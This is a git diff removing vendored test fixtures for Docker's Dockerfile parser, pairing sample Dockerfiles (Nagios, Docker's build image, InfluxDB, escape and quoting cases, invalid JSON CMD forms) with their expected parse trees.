-FROM cpuguy83/ubuntu
-ENV NAGIOS_HOME /opt/nagios
-ENV NAGIOS_USER nagios
-ENV NAGIOS_GROUP nagios
-ENV NAGIOS_CMDUSER nagios
-ENV NAGIOS_CMDGROUP nagios
-ENV NAGIOSADMIN_USER nagiosadmin
-ENV NAGIOSADMIN_PASS nagios
-ENV APACHE_RUN_USER nagios
-ENV APACHE_RUN_GROUP nagios
-ENV NAGIOS_TIMEZONE UTC
-
-RUN sed -i 's/universe/universe multiverse/' /etc/apt/sources.list
-RUN apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx
-RUN ( egrep -i  "^${NAGIOS_GROUP}" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i "^${NAGIOS_CMDGROUP}" /etc/group || groupadd $NAGIOS_CMDGROUP )
-RUN ( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )
-
-ADD http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3 /tmp/nagios.tar.gz
-RUN cd /tmp && tar -zxvf nagios.tar.gz && cd nagios  && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf
-ADD http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz /tmp/
-RUN cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install
-
-RUN sed -i.bak 's/.*\=www\-data//g' /etc/apache2/envvars
-RUN export DOC_ROOT="DocumentRoot $(echo $NAGIOS_HOME/share)"; sed -i "s,DocumentRoot.*,$DOC_ROOT," /etc/apache2/sites-enabled/000-default
-
-RUN ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo
-
-RUN echo "use_timezone=$NAGIOS_TIMEZONE" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo "SetEnv TZ \"${NAGIOS_TIMEZONE}\"" >> /etc/apache2/conf.d/nagios.conf
-
-RUN mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs
-RUN echo "cfg_dir=${NAGIOS_HOME}/etc/conf.d" >> ${NAGIOS_HOME}/etc/nagios.cfg
-RUN echo "cfg_dir=${NAGIOS_HOME}/etc/monitor" >> ${NAGIOS_HOME}/etc/nagios.cfg
-RUN download-mibs && echo "mibs +ALL" > /etc/snmp/snmp.conf
-
-RUN sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && \
-  sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg
-RUN cp /etc/services /var/spool/postfix/etc/
-
-RUN mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix
-ADD nagios.init /etc/sv/nagios/run
-ADD apache.init /etc/sv/apache/run
-ADD postfix.init /etc/sv/postfix/run
-ADD postfix.stop /etc/sv/postfix/finish
-
-ADD start.sh /usr/local/bin/start_nagios
-
-ENV APACHE_LOCK_DIR /var/run
-ENV APACHE_LOG_DIR /var/log/apache2
-
-EXPOSE 80
-
-VOLUME ["/opt/nagios/var", "/opt/nagios/etc", "/opt/nagios/libexec", "/var/log/apache2", "/usr/share/snmp/mibs"]
-
-CMD ["/usr/local/bin/start_nagios"]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result
deleted file mode 100644
index 25dd3ddfe5..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result
+++ /dev/null
@@ -1,40 +0,0 @@
-(from "cpuguy83/ubuntu")
-(env "NAGIOS_HOME" "/opt/nagios")
-(env "NAGIOS_USER" "nagios")
-(env "NAGIOS_GROUP" "nagios")
-(env "NAGIOS_CMDUSER" "nagios")
-(env "NAGIOS_CMDGROUP" "nagios")
-(env "NAGIOSADMIN_USER" "nagiosadmin")
-(env "NAGIOSADMIN_PASS" "nagios")
-(env "APACHE_RUN_USER" "nagios")
-(env "APACHE_RUN_GROUP" "nagios")
-(env "NAGIOS_TIMEZONE" "UTC")
-(run "sed -i 's/universe/universe multiverse/' /etc/apt/sources.list")
-(run "apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx")
-(run "( egrep -i  \"^${NAGIOS_GROUP}\" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i \"^${NAGIOS_CMDGROUP}\" /etc/group || groupadd $NAGIOS_CMDGROUP )")
-(run "( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )")
-(add "http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3" "/tmp/nagios.tar.gz")
-(run "cd /tmp && tar -zxvf nagios.tar.gz && cd nagios  && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf")
-(add "http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz" "/tmp/")
-(run "cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install")
-(run "sed -i.bak 's/.*\\=www\\-data//g' /etc/apache2/envvars")
-(run "export DOC_ROOT=\"DocumentRoot $(echo $NAGIOS_HOME/share)\"; sed -i \"s,DocumentRoot.*,$DOC_ROOT,\" /etc/apache2/sites-enabled/000-default")
-(run "ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo")
-(run "echo \"use_timezone=$NAGIOS_TIMEZONE\" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo \"SetEnv TZ \\\"${NAGIOS_TIMEZONE}\\\"\" >> /etc/apache2/conf.d/nagios.conf")
-(run "mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs")
-(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/conf.d\" >> ${NAGIOS_HOME}/etc/nagios.cfg")
-(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/monitor\" >> ${NAGIOS_HOME}/etc/nagios.cfg")
-(run "download-mibs && echo \"mibs +ALL\" > /etc/snmp/snmp.conf")
-(run "sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg &&   sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg")
-(run "cp /etc/services /var/spool/postfix/etc/")
-(run "mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix")
-(add "nagios.init" "/etc/sv/nagios/run")
-(add "apache.init" "/etc/sv/apache/run")
-(add "postfix.init" "/etc/sv/postfix/run")
-(add "postfix.stop" "/etc/sv/postfix/finish")
-(add "start.sh" "/usr/local/bin/start_nagios")
-(env "APACHE_LOCK_DIR" "/var/run")
-(env "APACHE_LOG_DIR" "/var/log/apache2")
-(expose "80")
-(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs")
-(cmd "/usr/local/bin/start_nagios")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile
deleted file mode 100644
index 99fbe55be0..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile
+++ /dev/null
@@ -1,103 +0,0 @@
-# This file describes the standard way to build Docker, using docker
-#
-# Usage:
-#
-# # Assemble the full dev environment. This is slow the first time.
-# docker build -t docker .
-#
-# # Mount your source in an interactive container for quick testing:
-# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
-#
-# # Run the test suite:
-# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
-#
-# # Publish a release:
-# docker run --privileged \
-#  -e AWS_S3_BUCKET=baz \
-#  -e AWS_ACCESS_KEY=foo \
-#  -e AWS_SECRET_KEY=bar \
-#  -e GPG_PASSPHRASE=gloubiboulga \
-#  docker hack/release.sh
-#
-# Note: AppArmor used to mess with privileged mode, but this is no longer
-# the case. Therefore, you don't have to disable it anymore.
-#
-
-FROM	ubuntu:14.04
-MAINTAINER	Tianon Gravi <admwiggin@gmail.com> (@tianon)
-
-# Packaged dependencies
-RUN	apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \
-	apt-utils \
-	aufs-tools \
-	automake \
-	btrfs-tools \
-	build-essential \
-	curl \
-	dpkg-sig \
-	git \
-	iptables \
-	libapparmor-dev \
-	libcap-dev \
-	libsqlite3-dev \
-	mercurial \
-	pandoc \
-	parallel \
-	reprepro \
-	ruby1.9.1 \
-	ruby1.9.1-dev \
-	s3cmd=1.1.0* \
-	--no-install-recommends
-
-# Get lvm2 source for compiling statically
-RUN	git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103
-# see https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
-# note: we don't use "git clone -b" above because it then spews big nasty warnings about 'detached HEAD' state that we can't silence as easily as we can silence them using "git checkout" directly
-
-# Compile and install lvm2
-RUN	cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper
-# see https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
-
-# Install Go
-RUN	curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz
-ENV	PATH	/usr/local/go/bin:$PATH
-ENV	GOPATH	/go:/go/src/github.com/docker/docker/vendor
-RUN	cd /usr/local/go/src && ./make.bash --no-clean 2>&1
-
-# Compile Go for cross compilation
-ENV	DOCKER_CROSSPLATFORMS	\
-	linux/386 linux/arm \
-	darwin/amd64 darwin/386 \
-	freebsd/amd64 freebsd/386 freebsd/arm
-# (set an explicit GOARM of 5 for maximum compatibility)
-ENV	GOARM	5
-RUN	cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'
-
-# Grab Go's cover tool for dead-simple code coverage testing
-RUN	go get golang.org/x/tools/cmd/cover
-
-# TODO replace FPM with some very minimal debhelper stuff
-RUN	gem install --no-rdoc --no-ri fpm --version 1.0.2
-
-# Get the "busybox" image source so we can build locally instead of pulling
-RUN	git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox
-
-# Setup s3cmd config
-RUN	/bin/echo -e '[default]\naccess_key=$AWS_ACCESS_KEY\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg
-
-# Set user.email so crosbymichael's in-container merge commits go smoothly
-RUN	git config --global user.email 'docker-dummy@example.com'
-
-# Add an unprivileged user to be used for tests which need it
-RUN groupadd -r docker
-RUN useradd --create-home --gid docker unprivilegeduser
-
-VOLUME	/var/lib/docker
-WORKDIR	/go/src/github.com/docker/docker
-ENV	DOCKER_BUILDTAGS	apparmor selinux
-
-# Wrap all commands in the "docker-in-docker" script to allow nested containers
-ENTRYPOINT	["hack/dind"]
-
-# Upload docker source
-COPY	.	/go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result
deleted file mode 100644
index d032f9bac4..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result
+++ /dev/null
@@ -1,24 +0,0 @@
-(from "ubuntu:14.04")
-(maintainer "Tianon Gravi <admwiggin@gmail.com> (@tianon)")
-(run "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \tapt-utils \taufs-tools \tautomake \tbtrfs-tools \tbuild-essential \tcurl \tdpkg-sig \tgit \tiptables \tlibapparmor-dev \tlibcap-dev \tlibsqlite3-dev \tmercurial \tpandoc \tparallel \treprepro \truby1.9.1 \truby1.9.1-dev \ts3cmd=1.1.0* \t--no-install-recommends")
-(run "git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103")
-(run "cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper")
-(run "curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz")
-(env "PATH" "/usr/local/go/bin:$PATH")
-(env "GOPATH" "/go:/go/src/github.com/docker/docker/vendor")
-(run "cd /usr/local/go/src && ./make.bash --no-clean 2>&1")
-(env "DOCKER_CROSSPLATFORMS" "linux/386 linux/arm \tdarwin/amd64 darwin/386 \tfreebsd/amd64 freebsd/386 freebsd/arm")
-(env "GOARM" "5")
-(run "cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'")
-(run "go get golang.org/x/tools/cmd/cover")
-(run "gem install --no-rdoc --no-ri fpm --version 1.0.2")
-(run "git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox")
-(run "/bin/echo -e '[default]\\naccess_key=$AWS_ACCESS_KEY\\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg")
-(run "git config --global user.email 'docker-dummy@example.com'")
-(run "groupadd -r docker")
-(run "useradd --create-home --gid docker unprivilegeduser")
-(volume "/var/lib/docker")
-(workdir "/go/src/github.com/docker/docker")
-(env "DOCKER_BUILDTAGS" "apparmor selinux")
-(entrypoint "hack/dind")
-(copy "." "/go/src/github.com/docker/docker")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile
deleted file mode 100644
index 08fa18acec..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile
+++ /dev/null
@@ -1,23 +0,0 @@
-FROM ubuntu
-ENV name value
-ENV name=value
-ENV name=value name2=value2
-ENV name="value value1"
-ENV name=value\ value2
-ENV name="value'quote space'value2"
-ENV name='value"double quote"value2'
-ENV name=value\ value2 name2=value2\ value3
-ENV name="a\"b"
-ENV name="a\'b"
-ENV name='a\'b'
-ENV name='a\'b''
-ENV name='a\"b'
-ENV name="''"
-# don't put anything after the next line - it must be the last line of the
-# Dockerfile and it must end with \
-ENV name=value \
-    name1=value1 \
-    name2="value2a \
-           value2b" \
-    name3="value3a\n\"value3b\"" \
-	name4="value4a\\nvalue4b" \
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result
deleted file mode 100644
index ba0a6dd7cb..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result
+++ /dev/null
@@ -1,16 +0,0 @@
-(from "ubuntu")
-(env "name" "value")
-(env "name" "value")
-(env "name" "value" "name2" "value2")
-(env "name" "\"value value1\"")
-(env "name" "value\\ value2")
-(env "name" "\"value'quote space'value2\"")
-(env "name" "'value\"double quote\"value2'")
-(env "name" "value\\ value2" "name2" "value2\\ value3")
-(env "name" "\"a\\\"b\"")
-(env "name" "\"a\\'b\"")
-(env "name" "'a\\'b'")
-(env "name" "'a\\'b''")
-(env "name" "'a\\\"b'")
-(env "name" "\"''\"")
-(env "name" "value" "name1" "value1" "name2" "\"value2a            value2b\"" "name3" "\"value3a\\n\\\"value3b\\\"\"" "name4" "\"value4a\\\\nvalue4b\"")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile
deleted file mode 100644
index 6def7efdcd..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile
+++ /dev/null
@@ -1,9 +0,0 @@
-# Comment here. Should not be looking for the following parser directive.
-# Hence the following line will be ignored, and the subsequent backslash
-# continuation will be the default.
-# escape = `
-
-FROM image
-MAINTAINER foo@bar.com
-ENV GOPATH \
-\go
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result
deleted file mode 100644
index 21522a880b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result
+++ /dev/null
@@ -1,3 +0,0 @@
-(from "image")
-(maintainer "foo@bar.com")
-(env "GOPATH" "\\go")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile
deleted file mode 100644
index 08a8cc4326..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile
+++ /dev/null
@@ -1,7 +0,0 @@
-# escape = ``
-# There is no white space line after the directives. This still succeeds, but goes
-# against best practices.
-FROM image
-MAINTAINER foo@bar.com
-ENV GOPATH `
-\go
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result
deleted file mode 100644
index 21522a880b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result
+++ /dev/null
@@ -1,3 +0,0 @@
-(from "image")
-(maintainer "foo@bar.com")
-(env "GOPATH" "\\go")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile
deleted file mode 100644
index ef30414a5e..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile
+++ /dev/null
@@ -1,6 +0,0 @@
-#escape = `
-
-FROM image
-MAINTAINER foo@bar.com
-ENV GOPATH `
-\go
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result
deleted file mode 100644
index 21522a880b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result
+++ /dev/null
@@ -1,3 +0,0 @@
-(from "image")
-(maintainer "foo@bar.com")
-(env "GOPATH" "\\go")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile
deleted file mode 100644
index 1ffb17ef08..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile
+++ /dev/null
@@ -1,14 +0,0 @@
-FROM ubuntu:14.04
-MAINTAINER Erik \\Hollensbe <erik@hollensbe.org>\"
-
-RUN apt-get \update && \
-  apt-get \"install znc -y
-ADD \conf\\" /.znc
-
-RUN foo \
-
-bar \
-
-baz
-
-CMD [ "\/usr\\\"/bin/znc", "-f", "-r" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result
deleted file mode 100644
index 13e409cb1a..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result
+++ /dev/null
@@ -1,6 +0,0 @@
-(from "ubuntu:14.04")
-(maintainer "Erik \\\\Hollensbe <erik@hollensbe.org>\\\"")
-(run "apt-get \\update &&   apt-get \\\"install znc -y")
-(add "\\conf\\\\\"" "/.znc")
-(run "foo bar baz")
-(cmd "/usr\\\"/bin/znc" "-f" "-r")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile
deleted file mode 100644
index 2418e0f069..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile
+++ /dev/null
@@ -1,10 +0,0 @@
-FROM scratch
-COPY foo /tmp/
-COPY --user=me foo /tmp/
-COPY --doit=true foo /tmp/
-COPY --user=me --doit=true foo /tmp/
-COPY --doit=true -- foo /tmp/
-COPY -- foo /tmp/
-CMD --doit [ "a", "b" ]
-CMD --doit=true -- [ "a", "b" ]
-CMD --doit -- [ ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result
deleted file mode 100644
index 4578f4cba4..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result
+++ /dev/null
@@ -1,10 +0,0 @@
-(from "scratch")
-(copy "foo" "/tmp/")
-(copy ["--user=me"] "foo" "/tmp/")
-(copy ["--doit=true"] "foo" "/tmp/")
-(copy ["--user=me" "--doit=true"] "foo" "/tmp/")
-(copy ["--doit=true"] "foo" "/tmp/")
-(copy "foo" "/tmp/")
-(cmd ["--doit"] "a" "b")
-(cmd ["--doit=true"] "a" "b")
-(cmd ["--doit"])
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile
deleted file mode 100644
index 081e442882..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile
+++ /dev/null
@@ -1,10 +0,0 @@
-FROM debian
-ADD check.sh main.sh /app/
-CMD /app/main.sh
-HEALTHCHECK
-HEALTHCHECK --interval=5s --timeout=3s --retries=3 \
-  CMD /app/check.sh --quiet
-HEALTHCHECK CMD
-HEALTHCHECK   CMD   a b
-HEALTHCHECK --timeout=3s CMD ["foo"]
-HEALTHCHECK CONNECT TCP 7000
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result
deleted file mode 100644
index 092924f88c..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result
+++ /dev/null
@@ -1,9 +0,0 @@
-(from "debian")
-(add "check.sh" "main.sh" "/app/")
-(cmd "/app/main.sh")
-(healthcheck)
-(healthcheck ["--interval=5s" "--timeout=3s" "--retries=3"] "CMD" "/app/check.sh --quiet")
-(healthcheck "CMD")
-(healthcheck "CMD" "a b")
-(healthcheck ["--timeout=3s"] "CMD" "foo")
-(healthcheck "CONNECT" "TCP 7000")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile
deleted file mode 100644
index 587fb9b54b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile
+++ /dev/null
@@ -1,15 +0,0 @@
-FROM ubuntu:14.04
-
-RUN apt-get update && apt-get install wget -y
-RUN wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb
-RUN dpkg -i influxdb_latest_amd64.deb
-RUN rm -r /opt/influxdb/shared
-
-VOLUME /opt/influxdb/shared
-
-CMD /usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml
-
-EXPOSE 8083
-EXPOSE 8086
-EXPOSE 8090
-EXPOSE 8099
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result
deleted file mode 100644
index 0998e87e63..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result
+++ /dev/null
@@ -1,11 +0,0 @@
-(from "ubuntu:14.04")
-(run "apt-get update && apt-get install wget -y")
-(run "wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb")
-(run "dpkg -i influxdb_latest_amd64.deb")
-(run "rm -r /opt/influxdb/shared")
-(volume "/opt/influxdb/shared")
-(cmd "/usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml")
-(expose "8083")
-(expose "8086")
-(expose "8090")
-(expose "8099")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile
deleted file mode 100644
index 39fe27d99c..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile
+++ /dev/null
@@ -1 +0,0 @@
-CMD "[\"echo\", \"Phew, I just managed to escaped those double quotes\"]"
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result
deleted file mode 100644
index afc220c2a7..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result
+++ /dev/null
@@ -1 +0,0 @@
-(cmd "\"[\\\"echo\\\", \\\"Phew, I just managed to escaped those double quotes\\\"]\"")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile
deleted file mode 100644
index eaae081a06..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile
+++ /dev/null
@@ -1 +0,0 @@
-CMD '["echo", "Well, JSON in a string is JSON too?"]'
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result
deleted file mode 100644
index 484804e2b2..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result
+++ /dev/null
@@ -1 +0,0 @@
-(cmd "'[\"echo\", \"Well, JSON in a string is JSON too?\"]'")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile
deleted file mode 100644
index c3ac63c07a..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile
+++ /dev/null
@@ -1 +0,0 @@
-CMD ['echo','single quotes are invalid JSON']
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result
deleted file mode 100644
index 6147891207..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result
+++ /dev/null
@@ -1 +0,0 @@
-(cmd "['echo','single quotes are invalid JSON']")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile
deleted file mode 100644
index 5fd4afa522..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile
+++ /dev/null
@@ -1 +0,0 @@
-CMD ["echo", "Please, close the brackets when you're done"
